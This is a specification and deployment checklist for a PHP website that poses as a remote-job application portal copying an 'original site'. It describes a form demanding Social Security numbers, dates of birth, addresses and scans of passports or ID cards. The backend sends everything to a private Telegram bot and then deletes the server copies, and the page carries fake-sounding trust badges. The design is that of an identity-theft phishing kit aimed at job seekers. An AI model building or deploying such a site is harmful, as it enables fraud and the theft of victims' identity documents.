COMPLETE PROFESSIONAL JOB APPLICATION WEBSITE
=============================================

STRUCTURE & ARCHITECTURE:
==========================
- header.php: Reusable header template with session management
- footer.php: Reusable footer template
- index.php: Main application page with hero, features, and form
- process.php: Secure backend processing with Telegram integration
- style.css: Complete responsive stylesheet

DESIGN MATCHING ORIGINAL SITE:
===============================
✓ Hero section with gradient background (blue → purple)
✓ Large centered heading and subtitle
✓ 3 trust badges (Secure Hiring, Worldwide Remote, Company Verified)
✓ 3-column feature section (Legit Employment, Reliable Income, Career Growth)
✓ Centered application form with rounded card design
✓ Gradient button matching original
✓ Soft shadows and clean spacing
✓ Footer with 3-column grid layout
✓ Fully responsive across all devices

FORM FIELDS (EXACT REQUIREMENTS):
==================================
1. First Name *
2. Last Name *
3. Email Address *
4. Residential Address *
5. Phone Number *
6. Date of Birth (mm/dd/yyyy) *
7. SSN (9 digits) *
8. Select Government ID * (Dropdown)
   - Passport
   - National ID Card
   - Driver Licence

CONDITIONAL FILE UPLOAD LOGIC:
===============================
PASSPORT:
- Shows: 1 upload field ("Upload Passport")
- Backend: Accepts only passportFile
- Backend: Rejects if idFront or idBack present

NATIONAL ID CARD / DRIVER LICENCE:
- Shows: 2 upload fields ("ID Front", "ID Back")
- Backend: Requires both files
- Backend: Rejects if passportFile present
- Enforcement: Frontend + Backend strict validation

SECURITY FEATURES IMPLEMENTED:
===============================
1. CSRF PROTECTION
   ✓ Session-based token using random_bytes(32)
   ✓ hash_equals() validation prevents timing attacks

2. RATE LIMITING
   ✓ 3 submissions per hour per IP
   ✓ Persistent storage in rate_limits.json
   ✓ Auto-cleanup of expired entries

3. HONEYPOT FIELD
   ✓ Hidden "website" field
   ✓ Positioned off-screen
   ✓ Instant rejection if filled

4. TIME-BASED VALIDATION
   ✓ Minimum 5 seconds form fill time
   ✓ Session-based tracking
   ✓ Future timestamp rejection

5. INPUT VALIDATION
   ✓ All inputs sanitized with htmlspecialchars
   ✓ Email: filter_var + pattern checks
   ✓ Phone: regex validation
   ✓ Text: length limits + XSS pattern detection
   ✓ Date: age validation (18-100 years)
   ✓ SSN: Exactly 9 digits validation
   ✓ Whitelist validation for dropdown

6. SECURE FILE UPLOAD
   ✓ MIME validation using finfo_file()
   ✓ Allowed: jpg, jpeg, png, pdf, doc, docx
   ✓ 5MB maximum file size
   ✓ Zero-byte rejection
   ✓ Double extension detection
   ✓ Secure random filename: bin2hex(random_bytes(16))
   ✓ Storage in /uploads/ with 0640 permissions
   ✓ Automatic cleanup after Telegram upload

7. SECURE HEADERS
   ✓ X-Content-Type-Options: nosniff
   ✓ X-Frame-Options: DENY
   ✓ X-XSS-Protection: 1; mode=block
   ✓ Referrer-Policy: strict-origin-when-cross-origin
   ✓ Content-Security-Policy with restrictions

8. ERROR HANDLING
   ✓ Display errors disabled
   ✓ All errors logged to error_log.txt
   ✓ Generic user-facing messages
   ✓ Detailed server-side logging

9. TELEGRAM INTEGRATION
   ✓ sendMessage for form data (HTML formatted)
   ✓ sendDocument for file uploads
   ✓ SSL verification enabled
   ✓ Timeouts configured
   ✓ Bot token server-side only
   ✓ Graceful API failure handling

10. POST-ONLY ACCESS
   ✓ GET requests rejected with HTTP 405
   ✓ Method validation

CONFIGURATION:
==============
Edit process.php lines 15-16:
   $botToken = 'YOUR_BOT_TOKEN_HERE';
   $chatId = 'YOUR_CHAT_ID_HERE';

FILE PERMISSIONS:
=================
- header.php: 0644
- footer.php: 0644
- index.php: 0644
- process.php: 0644
- style.css: 0644
- uploads/: 0750 (auto-created)

PHP REQUIREMENTS:
=================
- PHP 7.0+
- cURL extension
- fileinfo extension
- Sessions enabled
- File uploads enabled

RESPONSIVE BREAKPOINTS:
=======================
- Desktop: 1200px+
- Tablet: 769-1199px
- Mobile: 481-768px
- Small Mobile: ≤480px

SCALABILITY:
============
- Modular header/footer for future pages
- Reusable CSS classes
- Clean file structure
- Easy to extend with additional pages
- Consistent design system

DEPLOYMENT CHECKLIST:
=====================
1. Upload all files to hosting
2. Configure Telegram credentials in process.php
3. Test form submission
4. Verify file uploads
5. Check Telegram message delivery
6. Test rate limiting
7. Verify CSRF protection
8. Test conditional file logic
9. Check responsive design
10. Monitor error_log.txt

MAINTENANCE:
============
- Monitor error_log.txt for issues
- Review rate_limits.json weekly
- Verify uploads/ directory is clean
- Update security headers as needed
- Keep PHP and extensions updated